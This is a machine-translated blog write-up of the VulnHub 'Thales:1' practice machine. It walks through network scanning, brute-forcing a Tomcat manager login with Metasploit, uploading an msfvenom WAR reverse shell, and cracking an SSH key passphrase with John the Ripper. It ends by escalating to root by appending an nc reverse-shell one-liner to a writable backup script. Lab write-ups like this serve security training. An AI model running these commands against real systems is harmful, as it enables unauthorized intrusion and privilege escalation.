当前位置:网站首页>[vulnhub range] thales:1
[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Catalog
3、 ... and 、 Elevated privileges
0x02 Dictionary explosion edit
Preface
describe
brief introduction : Open your eyes , Another angle
Include 2 A sign :user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Introduction to the environment kali 192.168.56.102 Thales Drone aircraft 192.168.56.101
One 、 information gathering
0x00 arp-scan scanning
arp-scan -I eth1 -l # Scan network card LAN
0x01 nmap scanning
Scan to two network segments Not sure which nmap Scan scan two IP
Open ports 22 and 8080
Visit Site , User name and password are required
Two 、 Exploit
0x00 msfconsole utilize
msf Search for tomcat login
To configure payload
user name tomcat password role1
Login successfully
0x01 Upload files
Look for function points , Found the upload point
utilize kali Generate war File Trojan do rebound shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
Upload successful , And run
3、 ... and 、 Elevated privileges
0x00 rebound shell
Listening port
Upgrade transaction mutual shell
sudo -l # Need a password , Unknown stay home User found under file Thales
stay `notes.txt` Found in the file `/usr/local/bin/backup.sh View file contents
0x02 Dictionary explosion
Find out .ssh Folder
It is found that the private key can be used ssh2john.py Generate password file explosion
use ssh2john.py Compile the script
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Burst out the code vodka06
Switching users
0x03 user.txt
see user.txt--- first flag
notes.txt yes root The powers of the , There may be something inside
0x04 rebound shell
notice backup.sh It has executive authority , Can write bounce shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
File content editing will directly replace , Append for selection
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
monitor 9999, After writing, you will connect by yourself
summary
Thales Learned
msf The use of blasting dictionary
rsa Use of private key ciphertext
边栏推荐
- 应用程序和matlab的通信方式
- 深度之眼(六)——矩阵的逆(附:logistic模型一些想法)
- 安科瑞电网智能化发展的必然趋势电力系统采用微机保护装置是
- Mysql database backup script
- PHP has its own filtering and escape functions
- 删除 console 语句引发的惨案
- Notification uses full resolution
- Markdown formula editing tutorial
- Wireless sensor networks -- ZigBee and 6LoWPAN
- Apache Doris just "graduated": why should we pay attention to this kind of SQL data warehouse?
猜你喜欢
PyTorch 中的乘法:mul()、multiply()、matmul()、mm()、mv()、dot()
Logback logging framework third-party jar package is available for free
Notification uses full resolution
Good news! Kelan sundb database and Hongshu technology privacy data protection management software complete compatibility adaptation
MySQL数据库基本操作-DQL-基本查询
Vs tool word highlight with margin
Unity3D_ Class fishing project, control the distance between collision walls to adapt to different models
Mysql database basic operation DQL basic query
喜讯!科蓝SUNDB数据库与鸿数科技隐私数据保护管理软件完成兼容性适配
Step by step monitoring platform ZABBIX
随机推荐
leetcode 241. Different ways to add parentheses design priority for operational expressions (medium)
47_ Contour lookup in opencv cv:: findcontours()
Mysql database basic operation DQL basic query
[flower carving experience] 15 try to build the Arduino development environment of beetle esp32 C3
JS modularization
招标公告:2022年云南联通gbase数据库维保公开比选项目(第二次)比选公告
【HCSD大咖直播】亲授大厂面试秘诀-简要笔记
markdown公式编辑教程
hellogolang
Vs tool word highlight with margin
Tragedy caused by deleting the console statement
【花雕体验】15 尝试搭建Beetle ESP32 C3之Arduino开发环境
SPI master rx time out中断
A JS script can be directly put into the browser to perform operations
Laravel 中config的用法
laravel构造函数和中间件执行顺序问题
Introduction to pyGame games
统计学习方法——感知机
Common training data set formats for target tracking
95. (cesium chapter) cesium dynamic monomer-3d building (building)